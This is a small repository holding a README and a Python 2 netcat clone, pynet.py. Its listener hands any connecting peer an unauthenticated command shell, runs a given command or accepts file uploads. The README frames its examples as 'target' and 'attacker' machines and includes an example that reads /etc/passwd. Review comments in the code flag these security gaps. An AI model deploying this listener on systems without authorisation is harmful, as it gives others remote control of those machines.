├── README.md
└── pynet.py


/README.md:
--------------------------------------------------------------------------------
1 | # Python-Net-Tool
2 | Python Net Tool is a simple networking tool written in Python
3 | that lets you
4 | read and write data over network connections using TCP
5 | (a badly made netcat)
6 | 
7 | ## Installation
8 | You only need python2 installed (yes python2 bruh)
9 | 
10 | ## Usage
11 | 
12 | ```
13 | python2 pynet.py -h
14 | ```
15 | ```
16 | Python Net Tool
17 | 
18 | Como usar: pynet.py -t host_alvo -p
19 | -l --listen - Ira "escutar" em [host]:[port] para
20 | entrada de conexões
21 | -e --execute=file_to_run - executa o arquivo fornecido em uma
22 | conexao recebida
23 | -c --command - Inicia uma command shell
24 | -u --upload=destino - Ao receber a conexao faz um upload
25 | pra [destino]
26 | 
27 | ```
28 | ### Flags
29 | ```
30 | -l --listen - listens on [host]:[port] for
31 | incoming connections
32 | ```
33 | ```
34 | -e --execute=file_to_run - runs the supplied file when a
35 | connection is received
36 | ```
37 | ```
38 | -c --command - Starts a command shell when the connection is received
39 | ```
40 | ```
41 | -u --upload=path - Upon receiving a connection, writes the received data to [path]
42 | ```
43 | 
44 | Examples
45 | 
46 | On target machine
47 | ```
48 | python2 pynet.py -l -p 4444 -c
49 | ```
50 | ![pynet](https://user-images.githubusercontent.com/62577914/100960050-e7788800-34f5-11eb-8d20-a9544134cf75.png)
51 | 
52 | On attacker machine
53 | ```
54 | python2 pynet.py -a 192.168.0.107 -p 4444
55 | ```
56 | ![eita](https://user-images.githubusercontent.com/62577914/100960122-08d97400-34f6-11eb-8319-b0aaf6a0a743.png)
57 | 
58 | 
59 | ### More examples
60 | 
61 | ```
62 | pynet.py -a 192.168.0.1 -p 5555 -l -c
63 | pynet.py -a 192.168.0.1 -p 5555 -l -u=c:\\ alvo.exe
64 | pynet.py -a 192.168.0.1 -p 5555 -l -e="cat /etc/passwd"
65 | echo 'ABCDEFGHI' | ./pynet.py -t 192.168.0.105 -p 135
66 | ```
67 | 
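# -*- coding: utf-8 -*-

# pynet.py
# Made by Kripto-Sec (Jean)
# For educational purposes only
# Do not use for malicious purposes
# github: github.com/Kripto-Sec
# Knowledge is not a crime
#
# NOTE(review): in listen mode this script exposes file upload (-u), command
# execution (-e) and an interactive shell (-c) to any peer that can reach the
# port. There is no authentication and no transport encryption, so run it only
# on an isolated lab network and bind it to a single interface with -a.
#
# Written for Python 2: socket payloads are handled as byte strings (str).


import sys
import socket
import getopt
import threading
import subprocess

# Global settings, filled in by main() from the command line
listen = False
command = False
upload = False
execute = ""
alvo = ""
upload_destino = ""
port = 0


def run_command(command):
    """Run *command* through the system shell and return its combined output.

    stdout and stderr are merged into one string. If the command cannot be
    started or exits with a non-zero status, a fixed error string is returned
    instead of its output.
    """
    # strip the trailing newline
    command = command.rstrip()

    # SECURITY: shell=True on a string that, in -c mode, arrives straight from
    # the socket. That is what this tool is for, but it means every connected
    # peer runs arbitrary commands as the user who started the listener.
    try:
        output = subprocess.check_output(
            command, stderr=subprocess.STDOUT, shell=True)
    except Exception:
        # Boundary against peer-supplied input: any failure becomes the error
        # string, while KeyboardInterrupt/SystemExit are no longer swallowed
        # (the original used a bare except).
        output = "Erro ao executar comando. \r\n"

    # the caller sends this back to the client
    return output


def client_handler(client_socket):
    """Serve one accepted connection according to the global options.

    Runs, in order: the upload step if ``upload_destino`` is set, the one-shot
    command if ``execute`` is set, and the interactive command loop if
    ``command`` is true. The socket is closed when the handler finishes, the
    peer disconnects, or a socket error occurs.
    """
    try:
        # upload requested?
        if len(upload_destino):
            # Keep reading until the peer closes its side of the connection.
            # NOTE(review): the whole upload is held in memory, with no size
            # limit, before it is written out.
            chunks = []
            while True:
                data = client_socket.recv(1024)
                if not data:
                    break
                chunks.append(data)
            file_buffer = "".join(chunks)

            # now try to write the received bytes to the destination
            try:
                with open(upload_destino, "wb") as file_descriptor:
                    file_descriptor.write(file_buffer)
            except (IOError, OSError):
                status = "Falha ao tentar salvar em %s\r\n" % upload_destino
            else:
                # acknowledge that the file was written
                status = "Arquivo salvo com sucesso em %s\r\n" % upload_destino
            client_socket.sendall(status)

        # one-shot command requested?
        if len(execute):
            # sendall: send() may transmit only part of a long output
            client_socket.sendall(run_command(execute))

        # interactive command loop
        if command:
            while True:
                # show a simple prompt
                client_socket.sendall("Command >> ")

                # receive until we see a line feed
                cmd_buffer = ""
                while "\n" not in cmd_buffer:
                    data = client_socket.recv(1024)
                    if not data:
                        # recv() returns an empty string once the peer has
                        # closed; without this check the loop spins forever.
                        return
                    cmd_buffer += data

                # run the command and send its output back
                client_socket.sendall(run_command(cmd_buffer))
    except socket.error:
        # connection dropped mid-exchange; nothing left to do for this peer
        pass
    finally:
        client_socket.close()


def server_loop():
    """Listen on ``alvo``:``port`` and serve each connection on its own thread.

    When no address was given, the listener binds to all interfaces.
    """
    global alvo

    # if no target is defined we listen on all interfaces
    # SECURITY: 0.0.0.0 makes the unauthenticated handlers reachable from
    # every network the host is attached to; pass -a to restrict the bind.
    if not len(alvo):
        alvo = "0.0.0.0"

    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((alvo, port))
    print('\033[1;96m' + "[+] Aguardando conexao em %s:%s" % (alvo, port) + '\033[0;0m')

    server.listen(5)

    while True:
        # NOTE(review): addr (the peer address) is not logged; the message
        # below prints the listening address.
        client_socket, addr = server.accept()
        print('\033[1;96m' + "[+] Conexao iniciada em %s:%s" % (alvo, port) + '\033[0;0m')

        # start a new thread for this client
        client_thread = threading.Thread(target=client_handler, args=(client_socket,))
        client_thread.start()


def client_sender(buffer):
    """Connect to ``alvo``:``port``, send *buffer*, then relay stdin and replies.

    After the optional initial send, the function alternates between printing
    what the peer sent and sending one line read from stdin. It returns when
    the peer closes the connection, on a socket error, or on EOF / Ctrl-C at
    the prompt; the socket is always closed on the way out.
    """
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # connect to the target host
        client.connect((alvo, port))

        if len(buffer):
            client.sendall(buffer)

        while True:
            # wait for data to come back; a read shorter than the buffer size
            # is treated as the end of the reply
            response = ""
            while True:
                data = client.recv(4096)
                response += data
                if len(data) < 4096:
                    break

            if not response:
                # empty read: the peer closed the connection
                break

            sys.stdout.write('\033[1;97m' + response)
            sys.stdout.flush()

            # wait for more input and send it off
            buffer = raw_input("")
            buffer += "\n"
            client.sendall(buffer)
    except (socket.error, EOFError, KeyboardInterrupt):
        pass
    finally:
        print('\033[1;31m' + "[*] Saindo!." + '\033[0;0m')
        # tear down the connection
        client.close()


def usar():
    """Print the usage text and exit with status 0."""
    print('\033[1;96m' + "Python Net Tool")
    print("")
    print("Como usar: pynet.py -t host_alvo -p")
    print("-l --listen - Ira \"escutar\" em [host]:[port] para")
    print(" entrada de conexões")

    print("-e --execute=file_to_run - executa o arquivo fornecido em uma")
    print(" conexao recebida")

    print("-c --command - Inicia uma command shell")
    print("-u --upload=destino - Ao receber a conexao faz um upload")
    print(" pra [destino]")

    print("")
    print("")
    print("Exemplos: ")
    print("pynet.py -a 192.168.0.1 -p 5555 -l -c")
    print("pynet.py -a 192.168.0.1 -p 5555 -l -u=c:\\\\ alvo.exe")
    print("pynet.py -a 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"")
    print("echo 'ABCDEFGHI' | ./pynet.py -t 192.168.0.105 -p 135" + '\033[0;0m')
    sys.exit(0)


def main():
    """Parse the command line into the module globals and start the chosen mode.

    Without -l, and with a target and a positive port, stdin is read to EOF
    and sent to the target (client mode). With -l the listener is started.
    """
    global listen
    global port
    global execute
    global command
    global upload_destino
    global alvo

    if not len(sys.argv[1:]):
        usar()

    # Read the command-line options.
    # Options that carry a value need ':' (short) or '=' (long); the original
    # spec omitted them for -u and for every long option, so those values were
    # never parsed. -t is accepted as an alias of -a because the usage text
    # documents it for the target host.
    try:
        opts, args = getopt.getopt(
            sys.argv[1:], "hle:a:t:p:cu:",
            ["help", "listen", "execute=", "alvo=", "port=", "command", "upload="])
    except getopt.GetoptError as err:
        print(str(err))
        usar()

    for o, a in opts:
        if o in ("-h", "--help"):
            usar()

        elif o in ("-l", "--listen"):
            listen = True

        elif o in ("-e", "--execute"):
            execute = a

        elif o in ("-c", "--command"):
            command = True

        elif o in ("-u", "--upload"):
            upload_destino = a

        elif o in ("-a", "-t", "--alvo"):
            alvo = a

        elif o in ("-p", "--port"):
            try:
                port = int(a)
            except ValueError:
                print("Porta invalida: %s" % a)
                usar()

        else:
            # explicit raise: an assert statement is stripped under -O
            raise AssertionError("Opcao invalida")

    # are we listening, or just sending data from stdin?
    if not listen and len(alvo) and port > 0:

        # read the buffer from stdin; this blocks, so press CTRL-D
        # if you are not piping input in
        print('\033[1;96m' + "Pressione CTRL-D para iniciar" + '\033[0;0m')
        buffer = sys.stdin.read()

        # send the data off
        client_sender(buffer)

    # we listen and, depending on the options above, accept an upload,
    # run a command, or hand back a shell
    if listen:
        server_loop()


if __name__ == "__main__":
    main()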